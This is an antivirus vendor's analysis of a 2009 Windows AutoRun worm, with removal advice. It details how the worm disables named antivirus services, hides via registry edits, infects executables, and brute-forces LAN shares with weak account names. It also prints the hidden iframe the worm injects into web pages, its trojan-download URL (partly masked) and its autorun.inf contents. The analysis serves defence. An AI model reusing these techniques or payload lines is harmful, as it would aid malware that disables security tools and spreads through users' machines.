捕獲時間
2009-1-12
病毒摘要
該樣本是使用“Delphi”編寫的蠕蟲程序�����,由微點主動防御軟件自動捕獲�����,采用“NsPacK”加殼與其它加殼的雙重加殼方式試圖躲避特征碼掃描,加殼后長度為 “76,295字節(jié)”�����,圖標為“
”���,使用“exe”擴展名���,通過“網(wǎng)頁木馬”����、“文件捆綁”�����、“移動存儲介質(zhì)”��、“局域網(wǎng)”等途徑植入用戶計算機,運行后下載其他木馬到本地運行��。
感染對象
Windows 2000/Windows XP/Windows 2003
傳播途徑
網(wǎng)頁木馬���、文件捆綁����、移動存儲介質(zhì)
防范措施
已安裝使用微點主動防御軟件的用戶,無須任何設(shè)置,微點主動防御將自動保護您的系統(tǒng)免受該病毒的入侵和破壞����。無論您是否已經(jīng)升級到最新版本����,微點主動防御都能夠有效清除該病毒��。如果您沒有將微點主動防御軟件升級到最新版���,微點主動防御軟件在發(fā)現(xiàn)該病毒后將報警提示您發(fā)現(xiàn)“未知木馬”�����,請直接選擇刪除處理(如圖1);
圖1 微點主動防御軟件自動捕獲未知病毒(未升級)
如果您已經(jīng)將微點主動防御軟件升級到最新版本���,微點將報警提示您發(fā)現(xiàn)"Worm.Win32.AutoRun.jzn”,請直接選擇刪除(如圖2)。
圖2 微點主動防御軟件升級后截獲已知病毒
對于未使用微點主動防御軟件的用戶�,微點反病毒專家建議:
1�����、不要在不明站點下載非官方版本的軟件進行安裝,避免病毒通過捆綁的方式進入您的系統(tǒng)。
2、建議關(guān)閉U盤自動播放���,具體操作步驟:開始->運行->gpedit.msc->計算機配置->管理模板->系統(tǒng)->在右側(cè)找到"關(guān)閉自動播放"->雙擊->選擇"已啟用"。
3、盡快將您的殺毒軟件特征庫升級到最新版本進行查殺,并開啟防火墻攔截網(wǎng)絡異常訪問�,如依然有異常情況請注意及時與專業(yè)的安全軟件廠商聯(lián)系獲取技術(shù)支持。
4����、開啟windows自動更新�����,及時打好漏洞補丁。
病毒分析
該樣本程序被執(zhí)行后��,嘗試刪除目錄%SystemRoot%\system32\drivers\下“TXPlatform.exe”文件,拷貝自身為“TXPlatform.exe”文件���,并調(diào)用運行“TXPlatform.exe”開啟一個新的進程�,后結(jié)束自身進程。
“TXPlatform.exe”進程啟動后,釋放名為“QQ.sys”的文件到目錄%SystemDrive%\下�����,并創(chuàng)建下列“RESSDT”服務:
| |
項:
HKLM\SYSTEM\CurrentControlSet\Services\RESSDT
鍵值:DisplayName
指向數(shù)據(jù):RESSDT
健值:ImagePath
指向數(shù)據(jù):%SystemDrive %\QQ.sys |
|
服務創(chuàng)建成功后調(diào)用此服務,驅(qū)動加載后恢復系統(tǒng)SSDT表�,解除計算機部分殺軟的主動防御,達到自身保護的目的���,成功后關(guān)閉此服務,并將此服務與“QQ.sys”文件進行刪除����,實現(xiàn)對恢復系統(tǒng)SSDT表模塊的隱藏��。
遍歷查找下列指定進程,找到后嘗試關(guān)閉該進程:
嘗試打開下列服務�����,一旦成功打開便嘗試對該服務進行下列的停止或刪除操作:
| |
“Schedule” 停止服務
“sharedaccess” 停止服務
“kavsvc” 停止服務
“kavsvc” 刪除服務
“AVP” 停止服務
“AVP” 刪除服務
“McAfeeFramework” 停止服務
“McAfeeFramework” 刪除服務
“McShield” 停止服務
“McTaskManager” 停止服務
“McTaskManager” 刪除服務
“McShield” 刪除服務
“navapsvc” 刪除服務
“wscsvc” 刪除服務
“KPfwSvc” 刪除服務
“SNDSrvc” 刪除服務
“ccProxy” 刪除服務
“ccEvtMgr” 刪除服務
“ccSetMgr” 刪除服務
“SPBBCSvc” 刪除服務
“Symantec Core LC” 刪除服務
“NPFMntor” 刪除服務
“MskService” 刪除服務
“FireSvc” 刪除服務
“RsCCenter” 停止服務
“RsCCenter” 刪除服務
“RsRavMon” 停止服務
“RsRavMon” 刪除服務 |
|
遍歷查找包含下列文字的窗口���,一旦找到便終止該進程:
| |
Winsock Expert
ComnView
SmartSniff
Sniff
CaptureNet
Spinet
Dsniff
嗅探
抓包 |
|
修改注冊表去除隱藏文件和文件夾屬性�,實現(xiàn)自身隱藏目的:
| |
項:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL
鍵值:CheckedValue
數(shù)據(jù):0 |
|
刪除系統(tǒng)啟動項HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run下指定安全軟件的啟動項鍵值�,實現(xiàn)指定安全軟件不能隨機啟動:
| |
鍵值:
kav
KAVPersonal50
AVP
McAfeeUpdaterUI
Network Associates Error Reporting Service
ShStatEXE |
|
添加注冊表啟動項,達到開機自啟動目的:
| |
項:
HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
鍵值:Explorer
數(shù)據(jù):%SystemRoot%\system32\drivers\TXPlatform.exe |
|
遍歷感染除下列指定的文件夾外的所有“.exe”文件為非PE文件����,并嘗試調(diào)用“winrar.exe”的相關(guān)指令感染壓縮包內(nèi)的文件�����,實現(xiàn)破壞用戶文件資料與自身的自我保護,并在感染過的文件夾下����,創(chuàng)建一個記錄感染日期的名為“ desktop_1.ini”的文件����,并修改屬性為“只讀”、“隱藏”與“系統(tǒng)”�。
| |
windows
winrar
winnt
system32
documents and settings
system volume information
recycled
windows nt
windowsupdate
windows media player
outlook express
internet explorer
netmeeting
common files
complus applications
common files
messenger
installshield installation information
msn
microsoft frontpage
movie maker
msn gamin zone |
|
并遍歷查找“.htm”, “.html”, “.asp”, “.aspx”, “.jsp”, “.php”類型文件�,找到后定位到文件末尾����,添加下列代碼,實現(xiàn)對網(wǎng)頁類型文件的掛馬:
| |
| <iframe src="http://www.52**S.COM/goto/mm.Htm" width=0 height=0></iframe> |
|
刪除自身的除IPC$外的所有默認共享���,枚舉局域網(wǎng)共享,找到后嘗試使用指定的大量弱口令密碼與下列指定的用戶名進行逐個嘗試訪問��,成功后在局域網(wǎng)中傳播此病毒:
| |
“Administrator”
“Guest”
“admin"
“Root”
“Apartment”
“Free”
“Both”
“Neutral” |
|
等待訪問下列網(wǎng)址木馬列表進行下載其它木馬并在下載后自動運行:
| |
| http://www.52**S.COM/goto/down.txt |
|
并訪問下列網(wǎng)址進行自身統(tǒng)計:
| |
| http://www.52**s.com/TJ.Htm |
|
不斷遍歷磁盤���,嘗試調(diào)用目錄%Temp%\下創(chuàng)建的隨機名稱批處理���,刪除免疫文件夾��,批處理內(nèi)容如下:
| |
rmdir /s /q 盤符:\autorun.inf
del %0 |
|
拷貝自身名為“ .exe”到磁盤分區(qū)根目錄,并創(chuàng)建“autorun.inf”文件����,均修改屬性為“只讀”��、“隱藏”與“系統(tǒng)”,“autorun.inf”內(nèi)容為:
| |
[AutoRun]
OPEN= .exe
shell\open=打開(&O)
shell\open\Command= .exe
shell\open\Default=1
shell\explore=資源管理器(&X)
shell\explore\Command= .exe |
|
